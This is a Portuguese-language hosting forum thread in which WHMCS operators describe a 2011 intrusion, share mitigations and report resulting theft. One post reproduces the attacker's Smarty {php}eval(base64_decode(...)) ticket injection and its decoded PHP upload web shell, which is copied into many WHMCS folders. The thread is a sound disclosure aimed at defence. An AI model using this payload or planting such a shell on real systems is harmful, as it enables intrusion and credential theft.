Clicky

Jump to content
Portal do Host
  • Sign Up

Sign in to follow this  
eloimarquessilva

Atenção! Falha de segurança no WHMCS

Recommended Posts

Prezados,

hoje estava instalando um modulo da VPS.NET em meu WHMCS e notei um arquivo estranho "jxh.php" verificando a data notei que coincide com a data em que começei a receber uns SPAMs no WHMCS. Acredito que isso tem a ver com a falha de segurança reportada no dia 1/12/2011 porem foi tarde a atualização.

Fizeram um dump nas tabelas do WHMCS sorte minha que as senhas dos clientes são criptografadas.

Mesmo assim providenciei a troca de senhas e dos HASHS de integração com o cPanel.

Procurem por este arquivo em seus servidores.

----

Joia acabei de achar mais arquivos inclusive um pra desencriptar senhas do WHMCS.

E outro pra roubar senhas dos domínios.

abuhalil.php

dw.php

hot.php

Edited by eloimarquessilva

Share this post


Link to post
Share on other sites

Encontrei por onde o ataque ao meu WHMCS entrou.

O cara abriu um ticket no suporte com este subject:


{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigianhoLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw0KJGFyPWV4cGxvZGUoIlxuIiwiYWRtaW4NCmF0dGFjaG1lbnRzDQpkb3dubG9hZHMNCmltYWdlcw0KaW5jbHVkZXMNCmxhbmcNCm1vZHVsZXMNCm9yZGVyDQpwaXBlDQpzdGF0dXMNCnRlbXBsYXRlcw0KdGVtcGxhdGVzX2MNCndpZGdldHMNCiIpOw0KDQpmb3JlYWNoKCRhciBhcyAka2V5ID0+ICR2YWwpDQp7DQokZm8gPSBmb3Blbih0cmltKCR2YWwpLiIvanhoLnBocCIsInciKTsgZndyaXRlKCRmbywkY29kZSk7DQp9'));{/php}

Que decodificando faz isso:

$code = base64_decode("<?php

echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';

if( $_POST['_upl'] == "Upload" ) {

	if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload SUKSES !!!</b><br><br>'; }

	else { echo '<b>Upload GAGAL !!!</b><br><br>'; }

}

?>");

$fo = fopen("jxh.php","w");

fwrite($fo,$code);

$ar=explode("\n","admin

attachments

downloads

images

includes

lang

modules

order

pipe

status

templates

templates_c

widgets

");


foreach($ar as $key => $val)

{

$fo = fopen(trim($val)."/jxh.php","w"); fwrite($fo,$code);

}

Daí pra frente ele consegue upar qualquer arquivo que quiser para dentro site.

Basicamente para se previnir deste ataque em especifico mova sua pasta templates_c para o "Home Directory" do seu site e deixe todas as demais pastas do WHMCS sem permissão de escrita. Isso deve avacalhar algumas funcionalidades como upload de arquivos etc (não testei a implicação disto ainda).

O problema que vejo é que o Matt não divulga o que as correções estão corrigindo e assim eu não sei se a correção que apliquei previne deste ataque ou nao.

Edited by eloimarquessilva

Share this post


Link to post
Share on other sites

Eloi, eu fiquei meio perdido porque havia uma atualização de novembro e logo em dezembro saiu outra, acho que é necessário aplicar as duas.

Outra coisa, recomendaria habilitar o open_basedir e também fazer uma varredura com aquele maldet que eu abri um tópico aqui sugerindo...acho que vai ajudá-lo a encontrar scripts maliciosos.

Boa sorte por ai.


oGigante.com • Revenda de Hospedagem + Construtor de Site
█ CloudLinux • DNS Próprio • Softaculous PREMIUM • PHP 5.2 ao 5.7 • Proteção Adicional e +

Share this post


Link to post
Share on other sites

Fiquem espertos com esse codigo malicioso, essa semana recebi esse codigo através de um ticket, acabei apenas fechando o ticket ao invés de apagar.

E hoje a coisa fedeu, recebi um email do pagseguro informando que havia feito um pagamento no valor de R$430,00 que eu não havia feito para uma tal pessoa, liguei imediatamente no pagseguro e abri um chamado informando que não fiz esse pagamento.

Mas para minha surpresa, tentei acessar meu email de cadastro do pagseguro e não consegui, tentei acessar o WHM da minha revenda e não consegui, tentei acessar o Moip e não consegui, o camarada trocou todas minhas senhas, a minha sorte foi que no Moip e Pagseguro tenho outras contas de emails cadastradas a acabei recebendo o email de notificação da transação.

Estou utilizando o whmcs na versão 4.4.2 posso migrar diretamente para versão recente?

Como posso identificar os arquivos maliciosos no diretorio do whmcs?

Já troquei todas as senhas, mas ainda estou meio perdido, o que devo fazer?

Obrigado!


"Não adianta olhar pro céu com muita fé e pouca luta..." (Gabriel, O Pensador)

Share this post


Link to post
Share on other sites

Olha eu vou dizer pra vocês com toda sinceridade.

Eu achei essa falha de segurança GRAVÍSSIMA e de gente muito AMADORA. Sinceramente acho que os desenvolvedores do WHMCS estão muito longe de serem bons desenvolvedores. O cara conseguir executar um código malicioso através da SMARTY? Francamente isso é um erro grotesco de desenvolvimento.

E olha que nem parei pra analisar mais afundo... estou realmente com medo de usar o WHMCS.

Share this post


Link to post
Share on other sites
Guest
This topic is now closed to further replies.
Sign in to follow this  

  • Recently Browsing   0 members

    No registered users viewing this page.



×
×
  • Create New...